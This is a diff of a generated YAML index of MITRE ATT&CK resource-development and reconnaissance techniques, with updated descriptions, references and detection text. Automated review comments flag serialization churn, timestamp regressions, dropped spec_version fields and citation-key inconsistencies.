- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -53734,7 +54394,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -53793,54 +54452,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
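Review bot: the `external_references` block removed at the top of this region (NationsBuying through Recorded Future Beacon Certificates) is not really dropped; the same seven entries come back in the next hunk with the entries reordered and the `source_name`/`description`/`url` key order changed, so nearly all of these lines are serialization churn around one real change, the `modified` stamp moving from 2022-04-25 to 2024-09-16. Suggest the regeneration script emit keys in a fixed order (or keep the order of the source STIX object) so that future updates diff down to the semantic lines.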
@@ -53851,22 +54466,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
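Review bot: `spec_version: '2.1'` is removed here and `x_mitre_attack_spec_version` jumps from 2.1.0 to 3.2.0 with `x_mitre_version` left at '1.1'; the same `spec_version` removal recurs in every technique in this diff, so confirm that nothing consuming this index keys on that field before merging. The one content change in the re-added reference list is the Recorded Future entry, which moves to the `/research/cobalt-strike-servers` path and gets a new retrieval date of September 16, 2024, matching the new `modified` timestamp.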
@@ -53929,37 +54588,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
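Review bot: `x_mitre_detection: ''` is carried over unchanged even though the description now names a third platform (Google Apps Scripts), cites `GWS Apps Script Abuse 2021` and links the technique to Hide Infrastructure, and `x_mitre_version` is bumped from '1.0' to '1.1'; the only data source remains 'Internet Scan: Response Content'. Worth raising upstream that the detection field stays empty for a technique whose description was just extended, since defenders reading this entry get no guidance at all.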
@@ -53983,11 +54643,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
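Review bot: the `url` for the new `GWS Apps Script Abuse 2021` reference ends in `#google_vignette`, an ad-interstitial fragment appended by the site's advertising script rather than part of the article address; the other BleepingComputer URL in this hunk (BlackWater Malware Cloudflare Workers) has no such fragment. Since this index is regenerated from the ATT&CK data, the fix belongs in the upstream reference rather than a hand edit here, but it should be flagged so the fragment is not propagated further.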
@@ -54045,17 +54708,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
@@ -54063,7 +54727,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -54077,7 +54741,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -54110,11 +54774,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
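Review bot: the two new Checkmarx references use inconsistent `source_name` spellings, `Chexmarx-seo` and `Checkmarx-oss-seo`; the misspelled key is the one the new description paragraph cites (`(Citation: Chexmarx-seo)`), so it resolves, but any rename has to change the reference entry and the citation in the description together, and as these are ATT&CK source values the correction should be made upstream rather than in this generated file.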
@@ -54136,7 +54807,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
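Review bot: the `modified` timestamp for T1588.003 goes backwards here, from 2022-04-25T14:00:00.188Z to 2021-10-17T16:19:50.018Z, while the techniques above (T1588, T1584.007, T1608.006) move forward into 2024; the same regression appears further down for T1588.005, T1596.003 and T1597.002, each reverting to a 2021 stamp. The identical old value 2022-04-25T14:00:00.188Z across all of these objects looks like a bulk stamp, and a `modified` value that decreases suggests these objects were taken from a bundle that still carries the pre-stamp timestamps, so please confirm which ATT&CK release the index was built from before merging.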
@@ -54154,47 +54825,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
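Review bot: for T1588.003 this hunk drops `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` and adds nothing in their place, whereas T1588 above was rewritten to `x_mitre_attack_spec_version: 3.2.0`; after this change some techniques in the file carry the field and some do not, which any consumer comparing spec versions needs to know. The T1587 removal that follows is the same reorder churn as for T1588: its `external_references`, `id`, `created` and marking fields come back in the next hunk with only the `modified` stamp (2024-10-15) and a new `revoked: false` as substantive changes.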
@@ -54203,21 +54837,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
@@ -54257,7 +54927,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54276,15 +54946,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
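Review bot: the T1584.001 description now adds compromise of a cloud service that manages domains (e.g., AWS Route53) as a hijacking path, but the detection text carried as unchanged context in the next hunk still speaks only of registrant and resolution changes, and the listed data sources remain 'Domain Name: Passive DNS' and 'Domain Name: Domain Registration'. The version bump to '1.4' in the following hunk reflects the new text; flag upstream that the detection guidance and data sources did not follow the description, since the cloud-service path would surface in that provider's audit logging rather than in registrar or DNS data.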
@@ -54292,19 +54960,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -54338,55 +55006,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
